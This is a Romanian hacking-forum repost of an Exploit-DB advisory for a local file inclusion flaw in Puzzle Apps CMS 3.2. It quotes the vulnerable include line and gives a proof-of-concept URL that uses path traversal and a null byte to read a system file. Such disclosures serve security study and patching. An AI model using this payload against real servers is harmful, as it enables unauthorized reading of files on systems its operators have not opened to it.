H4cky0u Forum
Tutoriale de toate tipurile
|
Nou pe simpatie: geogeorgiana17 la Simpatie.ro
 | Femeie 25 ani Arad cauta Barbat 26 - 57 ani |
|
|
H4cky0u ForumReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
GaMaAdministrator
Postari: 205
|
|
Code:
Puzzle Apps CMS 3.2 Local File Inclusion
EDB-ID: 17343 CVE: N/A OSVDB-ID: N/A
Author: Treasure Priyamal Published: 2011-05-29 Verified: Not Verified
Exploit Code: Download Vulnerable App: Download
Rating
Overall:
1
2
3
4
5
(0.0)
Prev Home Next
view source
print?
# ------------------------------------------------------------------------
# Software................ Puzzle Apps CMS 3.2
# Vulnerability........... Local File Inclusion
# Site.................... http://www.puzzleapps.org/
# Download Link........... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download
# Discovery Date.......... 5/29/2011
# Tested On............... Windows XPsp2 + WAMP
# ------------------------------------------------------------------------
# Author.................. Treasure Priyamal
# Site.................... http://www.treasuresec.com/
# Email................... Treasure Priyamal < >
# ------------------------------------------------------------------------
#
#
# --Description--
#
# In Puzzle App CMS there are couple of the places you will be able to find
# LFI vulns.
#
#
# -- Vulnerable Source
# include_once ($COREROOT . "config/loader.config.php");
#
# --Sample to LFI--
#
#http://localhost/puzzle/core/config.loader.php?COREROOT=[LFI]
#
#
# --PoC LFI --
#
#http://localhost/puzzle/core/config.loader.php?COREROOT=../../../boot.ini%00
#
#
Comments
No comments so far
© Offensive Security 2011 |
|
|
| |
|